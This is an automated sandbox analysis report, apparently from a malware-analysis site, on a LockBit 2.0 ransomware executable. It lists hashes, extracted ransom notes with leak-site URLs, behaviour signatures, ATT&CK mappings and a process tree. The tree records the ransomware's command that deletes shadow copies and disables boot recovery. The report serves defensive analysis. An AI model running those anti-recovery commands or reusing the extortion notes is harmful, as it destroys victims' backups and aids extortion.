Overview

overview

10

Static

static

90af3848d5...46.exe

windows10_x64

10

Analysis

  • max time kernel
    178s
  • max time network
    138s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    20-10-2021 13:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    90af3848d5a0c5eb9c6ddc1ee2e6c539dd6cb5ec5a433d00a6dae22fb221c446.exe

  • Size

    7.5MB

  • MD5

    ce5d09832339eb7ef86f2c22b4904a20

  • SHA1

    e2db01d0a5572f580f5b7b28b4c9f1a04b35dc06

  • SHA256

    90af3848d5a0c5eb9c6ddc1ee2e6c539dd6cb5ec5a433d00a6dae22fb221c446

  • SHA512

    3c6c6dc0943320f151aacdf04bb417fe42454f52b7b5a1cf2a1e8f6c0e57e8d73a1637c90253cbef87815dfc857c118cb1d29f313e2814d1ea30a19789db5d26

Score
10/10
lockbitdiscoveryevasionpersistenceransomwareupx

Malware Config

Extracted

Path

C:\odt\Restore-My-Files.txt

Ransom Note
LockBit 2.0 Ransomware Your data are stolen and encrypted The data will be published on TOR website http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion and https://bigblog.at if you do not pay the ransom You can contact us and decrypt one file for free on these TOR sites http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion OR https://decoding.at Decryption ID: C761DC4A4171AB3069AEF833226BDD9E
URLs

http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion

https://bigblog.at

http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion

http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion

https://decoding.at

Extracted

Path

C:\Users\Admin\Desktop\LockBit_Ransomware.hta

Ransom Note
Any attempts to restore your files with the thrid-party software will be fatal for your files! To recovery your data and not to allow data leakage, it is possible only through purchase of a private key from us There is only one way to get your files back: Through a standard browser Brave (supports Tor links) FireFox Chrome Edge Opera Open link - https://decoding.at/ Through a Tor Browser - recommended Download Tor Browser - https://www.torproject.org/ and install it. Open one of links in Tor browser and follow instructions on these pages: http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion/or mirrorhttp://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion/These links work only in the Tor browser! Follow the instructions on this page https://decoding.at may be blocked. We recommend using a Tor browser (or Brave) to access the TOR site Do not rename encrypted files. Do not try to decrypt using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price (they add their fee to our). Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN. Tor Browser user manual https://tb-manual.torproject.org/about All your stolen important data will be loaded into our blog if you do not pay ransom. Our blog http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion or https://bigblog.at where you can see data of the companies which refused to pay ransom.
URLs

https://decoding.at/

http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion/or

https://decoding.at

http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion

https://bigblog.at

Signatures

  • Lockbit

    Ransomware family with multiple variants released since late 2019.

    ransomwarelockbit
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Executes dropped EXE 2 IoCs
  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Control Panel 2 IoCs
    evasion
  • Modifies registry class 28 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\90af3848d5a0c5eb9c6ddc1ee2e6c539dd6cb5ec5a433d00a6dae22fb221c446.exe
    "C:\Users\Admin\AppData\Local\Temp\90af3848d5a0c5eb9c6ddc1ee2e6c539dd6cb5ec5a433d00a6dae22fb221c446.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1684
    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
      "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:1798690 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\90af3848d5a0c5eb9c6ddc1ee2e6c539dd6cb5ec5a433d00a6dae22fb221c446.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2481030822-2828258191-1606198294-1000"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3580
      • C:\Users\Admin\AppData\Roaming\SBOP Crystal\sharpsvn.exe
        "C:\Users\Admin\AppData\Roaming\SBOP Crystal\sharpsvn.exe"
        3⤵
        • Executes dropped EXE
        • Modifies extensions of user files
        • Loads dropped DLL
        • Adds Run key to start application
        • Drops desktop.ini file(s)
        • Enumerates connected drives
        • Drops file in System32 directory
        • Sets desktop wallpaper using registry
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Program Files directory
        • Modifies Control Panel
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:840
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2784
          • C:\Windows\system32\vssadmin.exe
            vssadmin delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:3900
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:664
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} bootstatuspolicy ignoreallfailures
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1688
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} recoveryenabled no
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:3300
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit_Ransomware.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          4⤵
            PID:2400
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Drops file in Windows directory
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:768
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
      1⤵
        PID:2308
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:1896
        • C:\Windows\system32\vssvc.exe
          C:\Windows\system32\vssvc.exe
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:660

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        Registry Run Keys / Startup Folder

        1
        T1060

        Privilege Escalation

        Defense Evasion

        File Deletion

        2
        T1107

        Modify Registry

        2
        T1112

        Credential Access

        Discovery

        Query Registry

        3
        T1012

        Peripheral Device Discovery

        2
        T1120

        System Information Discovery

        3
        T1082

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Inhibit System Recovery

        3
        T1490

        Defacement

        1
        T1491

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
          MD5

          ac23d03c4b8d531016a3c1ebfa2bc91c

          SHA1

          11383627d5515ed2257f594db7fbce3a4b9106f8

          SHA256

          0ddd10f3c8a3268237117f08a94c52ead801a76286bb76d0f521b56689801d06

          SHA512

          bb649ab787a05dba410ce43a592b7f122c71f1fdc69bbb8789c57a3e64018189eebb9b46669a2d6a1b156818bb59beed130aeae6e1928108dee16168445659c1

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
          MD5

          ac23d03c4b8d531016a3c1ebfa2bc91c

          SHA1

          11383627d5515ed2257f594db7fbce3a4b9106f8

          SHA256

          0ddd10f3c8a3268237117f08a94c52ead801a76286bb76d0f521b56689801d06

          SHA512

          bb649ab787a05dba410ce43a592b7f122c71f1fdc69bbb8789c57a3e64018189eebb9b46669a2d6a1b156818bb59beed130aeae6e1928108dee16168445659c1

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll
          MD5

          e7a789232ef503dcb4929791673009a3

          SHA1

          8bc28bce4c9d8b4a6e360100441ba54a878de4c1

          SHA256

          89daa79b558055f6f893abf38a0f17d3e1e0193d59dafbdf98d72d4e5961c2a1

          SHA512

          6439a2ec5e9d486c15a37a736bc8d36d8e5f6ecb6a354d0fdd7efc9dccd3fb6bdb208a051b0d81f101669169826e07f9b4ddd79259c79c1e03856af5a9442b87

          Download Submit
        • C:\Users\Admin\AppData\Roaming\SBOP Crystal\Guide.pdf
          MD5

          413618ca437d7831df51303188cd207b

          SHA1

          85ea80cfb5db25c756da7ba5992665ea80aee560

          SHA256

          f2d0e13a6ec546f169d45ad5b62ced1bcc3a4e01ae6dc3666239defc959e2baa

          SHA512

          f70dab7aca530bd5013903e050bd974c8ad991c5d8d5ef8b5f6f4efba8acc6d37014b8bc63e3e73679a8229a9e33fd4c0ed3c8b6d5b9628a8735cb32210b30e6

          Download Submit
        • C:\Users\Admin\AppData\Roaming\SBOP Crystal\qclp-2.3.dll
          MD5

          852ba853bb6e9fc1476a7907a17be760

          SHA1

          21ef22a3dd2e4b32fbe8f56b7d87510fd9529d5c

          SHA256

          b98b6b7e4ca7f5827d8d5cb34b39a3f4ca8c3dac5d7751d64876d944301084ff

          SHA512

          79bdc1fc374d2cb147237d5e34bc95ba1744ed111d1bd861c28124732e4c179442aec9f7b0ee33d65eef0c9e4eb939d3a5392b9f81cb518ce3ca47ccd86f6c12

          Download Submit
        • C:\Users\Admin\AppData\Roaming\SBOP Crystal\sharpsvn.exe
          MD5

          042f1ad45934818427a842170fd8f8f7

          SHA1

          1e689e2ff66ad665a6aecaadff2ccdec68cbe0d4

          SHA256

          1fa7159ab6a545dbaae94e954909cecad354127a2338ce15dea4c79937fd5c7b

          SHA512

          e157f38145ab8dfede75434e5bbd449cf5fb1138103ad062898726e7956cbda12f2b757c050572ec0930b33422c3fc4646f3c75e3324483638492512be77a4c0

          Download Submit
        • C:\Users\Admin\AppData\Roaming\SBOP Crystal\sharpsvn.exe
          MD5

          042f1ad45934818427a842170fd8f8f7

          SHA1

          1e689e2ff66ad665a6aecaadff2ccdec68cbe0d4

          SHA256

          1fa7159ab6a545dbaae94e954909cecad354127a2338ce15dea4c79937fd5c7b

          SHA512

          e157f38145ab8dfede75434e5bbd449cf5fb1138103ad062898726e7956cbda12f2b757c050572ec0930b33422c3fc4646f3c75e3324483638492512be77a4c0

          Download Submit
        • C:\Users\Admin\Desktop\LockBit_Ransomware.hta
          MD5

          c15c6adc8c923ad87981f289025c37b2

          SHA1

          bfe6533f4afe3255046f7178f289a4c75ad89e76

          SHA256

          90f3a33919fdd766e90fd96f8f20a92c2d1376b7cfdc8b738c2f8e7e6c7498b1

          SHA512

          31dd03b208e00ac012fbe4189d5af1306cc8e3640d40efefab4aa1cabab3c4735eef0cb65e7750c3c77021934e145398e5e26389975cf36b193c8f622a5fde83

          Download Submit
        • \Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll
          MD5

          e7a789232ef503dcb4929791673009a3

          SHA1

          8bc28bce4c9d8b4a6e360100441ba54a878de4c1

          SHA256

          89daa79b558055f6f893abf38a0f17d3e1e0193d59dafbdf98d72d4e5961c2a1

          SHA512

          6439a2ec5e9d486c15a37a736bc8d36d8e5f6ecb6a354d0fdd7efc9dccd3fb6bdb208a051b0d81f101669169826e07f9b4ddd79259c79c1e03856af5a9442b87

          Download Submit
        • \Users\Admin\AppData\Roaming\SBOP Crystal\7-zip.dll
          MD5

          23c651b2ace76d42fec3989bcba3ce7b

          SHA1

          378776d20133f20a4c42476bdcb0a408ef1dce1c

          SHA256

          1b8410f839283a9483369dacdb22290b065ece6f00c026d953024666761532e2

          SHA512

          e47ae720b9ee4388dacfdbf2ba1e2dc546cc01fdb25a6c82ceeeda03801e449f660e97b3bbb6f65b791bfc1566f21187053472022c6c7c0d68f8cf1187326ec8

          Download Submit
        • \Users\Admin\AppData\Roaming\SBOP Crystal\Filters\LC.dll
          MD5

          6316c4082cacf8f3f4f22daef56cb15c

          SHA1

          cea3de90b20396b092797ec8c7e241e822c8faed

          SHA256

          5594b08c79a4d188a674713011cd516618fa36d2f988f7d353fb3370939a4062

          SHA512

          e1e0a6440f91b208b61775e30d8fc1be299a298e00ed564ca7c74fa8728738af66e6c3c0805553abbc4a8d2838cd21bfde61ac2322fff4e62ac4d6796a0821bc

          Download Submit
        • \Users\Admin\AppData\Roaming\SBOP Crystal\qclp-2.3.dll
          MD5

          852ba853bb6e9fc1476a7907a17be760

          SHA1

          21ef22a3dd2e4b32fbe8f56b7d87510fd9529d5c

          SHA256

          b98b6b7e4ca7f5827d8d5cb34b39a3f4ca8c3dac5d7751d64876d944301084ff

          SHA512

          79bdc1fc374d2cb147237d5e34bc95ba1744ed111d1bd861c28124732e4c179442aec9f7b0ee33d65eef0c9e4eb939d3a5392b9f81cb518ce3ca47ccd86f6c12

          Download Submit
        • memory/664-130-0x0000000000000000-mapping.dmp
          Download
        • memory/840-122-0x0000000000000000-mapping.dmp
          Download
        • memory/1688-131-0x0000000000000000-mapping.dmp
          Download
        • memory/2400-134-0x0000000000000000-mapping.dmp
          Download
        • memory/2784-128-0x0000000000000000-mapping.dmp
          Download
        • memory/3300-132-0x0000000000000000-mapping.dmp
          Download
        • memory/3580-115-0x0000000000000000-mapping.dmp
          Download
        • memory/3900-129-0x0000000000000000-mapping.dmp
          Download